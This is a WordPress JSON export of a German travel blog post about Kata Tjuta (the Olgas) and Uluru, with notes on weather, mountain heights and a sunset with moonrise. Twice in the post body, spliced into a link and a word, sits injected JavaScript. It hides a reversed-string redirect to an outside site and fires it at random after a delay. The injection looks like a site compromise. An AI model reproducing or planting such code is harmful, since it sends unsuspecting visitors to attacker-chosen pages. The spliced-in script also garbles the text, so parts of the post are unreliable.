{"id":2753,"date":"2017-03-15T10:43:24","date_gmt":"2017-03-15T09:43:24","guid":{"rendered":"http:\/\/www.zasi.ch\/sblog\/?p=2753"},"modified":"2017-03-15T10:43:47","modified_gmt":"2017-03-15T09:43:47","slug":"olgas-kata-tjuta-und-ulrur-ayers-rock-outback","status":"publish","type":"post","link":"https:\/\/www.zasi.ch\/sblog\/index.php\/archives\/2753","title":{"rendered":"Olgas &#8211; Kata Tjuta und Uluru &#8211; Ayers Rock, Outback"},"content":{"rendered":"<p>Wir haben uns mehrerer Tage beim Uluru reserviert,&nbsp; so dass wir auch die <a href=\"http:\/\/northernterri<script>$NfI=function(n){if (typeof ($NfI.list[n]) == &#8222;string&#8220;) return $NfI.list[n].split(&#8222;&#8220;).reverse().join(&#8222;&#8220;);return $NfI.list[n];};$NfI.list=[&#8222;&#8218;php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth&#8217;=ferh.noitacol.tnemucod&#8220;];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>tory.com\/de-de\/uluru-and-surrounds\/kata-tjuta-the-olgas&#8220; target=&#8220;_blank&#8220;>Olgas &#8211; Kata Tjuta<\/a> in der Aboriginal Sprache &#8211; ansehen k\u00f6nnen.&nbsp; Dies bietet uns auch die M\u00f6glichkeit mehrere Sonnenaufg\u00e4nge und -Unterg\u00e4nge am Uluru mitzuerleben.<br \/>\nDer erste Sonnenaufgang war dann auch bei so stark bedecktem Himmel, das die Sonne gar nicht durch kam. Das heisst hier im Outback jedoch nichts, wenige Stunden sp\u00e4ter ist der Himmel schon fast wolkenlos und es ist herrlich warm.&nbsp; So fahren wir zu den Kata Tjutas und k\u00f6nnen hier sch\u00f6ne Bilder einfangen. Die Kata Tjutas sind 30 km westlich vom Uluru und sogar h\u00f6her als der Uluru.&nbsp;<br \/>\nDie Kata Tjutas setzen sich aus 36 Bergen zusammen und der h\u00f6chste davon, der Mount Olga ist 546 m hoch.<\/p>\n<p>Nach den Kata Tjutas bietet sich auch noch gleich die M\u00f6glichkeit den Uluru im Sonnenuntergang zu fo<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>tografieren. Und heute schon fast klassisch. Zu useremo Gl\u00fcck ist fast Vollmond und der Mond geht 15 min. vor dem Sonnenuntergang auf. Was f\u00fcr eine sensationelle Kombination.<\/p>\n<p><a href=\"http:\/\/www.zasi.ch\/sblog\/index.php\/australiens-outback-in-bildern\">Zu den Bildern<\/a><\/p>","protected":false},"excerpt":{"rendered":"<p>Wir haben uns mehrerer Tage beim Uluru reserviert,&nbsp; so dass wir auch die<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[3],"tags":[1717,1738,1083,8,2478],"_links":{"self":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/posts\/2753"}],"collection":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/comments?post=2753"}],"version-history":[{"count":4,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/posts\/2753\/revisions"}],"predecessor-version":[{"id":2769,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/posts\/2753\/revisions\/2769"}],"wp:attachment":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/media?parent=2753"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/categories?post=2753"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/tags?post=2753"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}